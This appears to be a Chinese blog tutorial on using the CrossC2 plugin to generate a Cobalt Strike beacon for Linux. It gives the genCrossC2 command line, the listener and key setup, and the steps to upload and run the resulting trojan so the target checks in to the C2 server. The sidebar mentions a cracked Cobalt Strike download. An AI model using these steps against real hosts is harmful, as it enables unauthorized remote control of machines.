CobaltStrike4.0上线Linux系统

最新推荐文章于 2024-06-05 10:03:00 发布
最新推荐文章于 2024-06-05 10:03:00 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: 渗透工具 文章标签: linux udp 渗透测试 macos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AngleWithShotgun/article/details/120314045
版权

环境介绍

  • 客户端系统:MacOS BigSur

  • 服务端系统:MacOS BigSur

  • 软件版本:CobaltStrike4.0

  • 插件版本:CrossC2-cs4.0

  • 被上线主机系统:Ubuntu20.04

插件介绍

面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。


	 ▄████▄   ██▀███   ▒█████    ██████   ██████     ▄████▄   ██████▄
	▒██▀ ▀█  ▓██ ▒ ██▒▒██▒  ██▒▒██    ▒ ▒██    ▒    ▒██▀ ▀█        ██░
	▒▓█    ▄ ▓██ ░▄█ ▒▒██░  ██▒░ ▓██▄   ░ ▓██▄      ▒▓█        █████▒
	▒▓▓▄ ▄██▒▒██▀▀█▄  ▒██   ██░  ▒   ██▒  ▒   ██▒   ▒▓▓▄ ▄█ ░▒██
	▒ ▓███▀ ░░██▓ ▒██▒░ ████▓▒░▒██████▒▒▒██████▒▒   ▒ ▓███▀  ░▒▓█████▓
	░ ░▒ ▒  ░░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░   ░ ░▒ ▒    ░▒ ░▓ ░░
	  ░  ▒     ░▒ ░ ▒░  ░ ▒ ▒░ ░ ░▒  ░ ░░ ░▒  ░ ░     ░  ▒     ░ ░░ ░
	░          ░░   ░ ░ ░ ░ ▒  ░  ░  ░  ░  ░  ░  CrossC2 v2.0 @hook
	░ ░         ░         ░ ░        ░        ░     ░ ░          ░
	░                                               ░

[usage]: genCrossC2 [host] [port] [beaconKey_file] [rebind_dynamic_lib] [platform] [arch] [outputFileName] <stagerType>

-host				1.1.1.1 (cs https_listener host)
-port				4444 (cs https_listener port)
-beaconKey_file			specify `.cobaltstrike.beacon_keys` file, read from current directory by default
-rebind_dynamic_lib		select a dynamic library that requires communication protocol rebinding
-platform			'MacOS' / 'Linux' / 'MacOS-bind' / 'Linux-bind'
-arch    			'x86' / 'x64'
-stagerType (optional)		'shellcode' / 'stager'

[ex]:
	default config:
		./genCrossC2 127.0.0.1 4444 null null MacOS x64 ./CrossC2-test

	specify `.cobaltstrike.beacon_keys` file:
		./genCrossC2 127.0.0.1 4444 /tmp/cs_server/.cobaltstrike.beacon_keys null MacOS x64 ./CrossC2-test

	custom communication protocol:
		./genCrossC2 127.0.0.1 4444 /tmp/cs_server/.cobaltstrike.beacon_keys ./cc2_rebind_udp_protocol.so MacOS x64 ./CrossC2-test

CrossC2 安装

首先去Github上下载CrossC2,注意一定要下载4.0专用版

链接放在这里了:

https://github.com/gloxec/CrossC2/tree/cs4.0

本人用的是MacOS系统,所以把客户端和服务端放在了一台设备上,如果说用的是windows系统,可以考虑用虚拟机开kali。

先打开CobaltStrike

打开CobaltStrike后,很多教程上来就让把服务端上的.cobaltstrike.beacon_keys文件放在客户端上,相信很多师傅总是找不到,其实这个文件是需要创建过监听器才会产生,所以要先创建监听器再复制文件,创建的监听器如下设置(监听器端口随意设置,能用即可),注意监听器一定要创建https的否则无法使用

image-20210915174535241

创建好监听器后将会在服务器端文件目录下生成.cobaltstrike.beacon_keys文件,将其复制到客户端文件目录下,将CrossC2项目src目录下的文件复制到客户端目录下

image-20210915174402992

在客户端目录下打开终端,使用如下命令

 ./genCrossC2.MacOS(Linux系统使用.Linux,windows系统使用.Win.exe具体根据客户端系统进行修改) xxxxxx(cs服务器的ip) xxx(监听器端口) ./.cobaltstrike.beacon_keys null Linux x64 ./CrossC2-test

在客户端目录下即可生成一个名为CrossC2-test的CS马

image-20210915175139520

image-20210915175222741

生成木马,传到服务器上,赋予执行权限

chmod +x CrossC2-test

运行木马

image-20210915175912881

上线成功,目前来看唯一的问题,在于不太稳定,且所能做的相比于windows系统的太少,可能本人才疏学浅,还没研究出来,希望各位大佬能给出一些建议,在此感谢

ShadowCui
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
基础CobaltStrike上线Linux主机
战神/calmness的博客
07-24 573
准备环境 1、(CrossC2) CrossC2-cs4.1\src\CrossC2.cna https://download.csdn.net/download/weixin_43650289/20447236 2、LINUX云服务器 3、C2插件genCrossC2.Linux 上传至Cobaltstrike3.14目录下 https://download.csdn.net/download/weixin_43650289/20447188 4、云服务器 5、CobaltStrike3.
Cobalt Strike上线linux
m0_72125469的博客
05-26 1083
Cross C2项目是一个可以生成 Linux/Mac OS 的 CS payload 的跨平台项目CrossC2安装 下载CrossC2.cna1 下载 cna文件和win_dev_update.zip压缩文件 到cs4.4目录下。
cobaltstrike进阶篇之linux上线linux
最新发布
weixin_69925635的博客
06-05 243
cs的部署和基本上线过程可以参考我前面一篇文章,接下来尝试利用linux(服务端和客户端都放在同一台kali上)上线linux(ubuntu)将CrossC2-GithubBot-2023-03-27.cna其中path改成genCrossC2.linux的path。选择CSversion为4.4,日志中出现success,在指定目录下出现t_cc2.out,传到靶机并双击运行,成功上线。这个时候cs顶部会多出来一个选项,选择创建一个c2监听器,在之前需要先创建一个https的监听器。
CobaltStrike 之 Linux上线笔记 (CrossC2插件使用)
热门推荐
box
03-03 1万+
CobaltStrike 默认是不支持Linux上线,有一款插件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款插件的配置和使用。 一、插件配置 项目地址:https://github.com/gloxec/CrossC2 将这两个文件下载下来,创建一个文件夹,并放置文件夹下 修改 CrossC2-GithubBot-2021-11-02.cna 修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 / 修改$CC2_BIN 为pay
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2449
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cscs上的Linux主机反弹shell给msf。
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
CobaltStrike4.0渗透测试手册
03-18
Cobalt Strike 4.0渗透测试手册》是一本深度探讨网络安全中渗透测试技术的专业指南,特别是聚焦于Cobalt Strike 4.0这一强大的安全工具Cobalt Strike是一款广泛使用的红队操作框架,它允许安全专业人员模拟攻击...
cobaltstrike4.0
05-27
**Cobalt Strike 4.0:网络安全与渗透测试的利器** Cobalt Strike是一款广泛应用于网络安全领域的高级渗透测试框架,特别在内网安全评估和红队操作中扮演着重要角色。其4.0版本发布时,带来了诸多新功能和改进,...
CobaltStrike4.0用户手册_中文翻译.pdf
04-29
CobaltStrike4.0用户手册_中文翻译.pdf
cobaltstrike4.0.zip
03-10
Cobalt Strike 4.0对核心框架进行了优化,提高了执行速度和稳定性,同时增强了其与现代操作系统环境的兼容性。这包括对Windows、LinuxmacOS平台的支持。 2. **更新的Beacon模块**: Beacon是Cobalt Strike的...
CrossC2-cs4.1.zip
07-24
CrossC2-cs4.1.zip
工具使用 | CobaltStrike上线Linux主机(CrossC2)
Ms08067安全实验室
07-04 1万+
CobaltStrike上线Linux主机(CrossC2)写在前面在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltS...
CobaltStrike如何上线Linux主机(解决坑位小白易懂)
晚安這個未知的世界
05-30 5894
前言 前段时间玩了一下打几层内网渗透的靶场实验,然后发现MSF可以上线,但是操作起来只能用命令操作,而且只能一个人的打,这时就想,CS这个强大的工具能不能上线Linux等其他平台的主机呢?于是百度、Google一番,弄了大概好几次,没弄成功,看了网上的大佬文章,感觉有点小细节没说出来,菜鸡的我折腾了很久,才成功的上线。下面我会详细的说一下,希望能帮助更多的小白去学习,让他们少走一些坑位。 工具CobaltStrike3.14版本,CrossC2使用的是2.0版本 CrossC2插件项目地址:https:
[渗透测试]Cobalt Strike如何上线linux主机
cosmoslin的博客
04-03 5555
环境配置 CobaltStrike 4.3 CrossC2 Kali(CS服务端) Kali(CS客户端) Kali(受害机) Cross C2简介 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。简而言之就是一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作。 支持架构: Windows Linux MacOS iOS Android Embedded R
关于CS上线Linux主机(CrossC2)
Adminxe的博客
07-11 2534
0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。 简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,记录一下使用过程中遇到的一些问题,并且在使用中操作的正确性。 Cross c2支持架构说明: ..
cobaltstrike linux上线方法
时光凉春衫薄的博客
01-15 6123
cobaltstrike linux上线方法
Cobalt Strike 插件CrossC2(小白教程)
m0_63239459的博客
03-10 1815
cobaltstrike插件加载crossc2
kali安装cobaltstrike详细教程
Cwillchris的博客
12-30 4514
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。
CobaltStrike 4.0渗透测试手册:中文翻译与深度解析
CobaltStrike 4.0用户手册是一份专为渗透测试人员设计的高级威胁战术指南,由Snowming翻译并经L.N.团队校对。奇安信A-TEAM作为奇安信集团的技术研究团队,专注于Web渗透、高级持续威胁(APT)防御、对抗性工具研发,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ShadowCui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值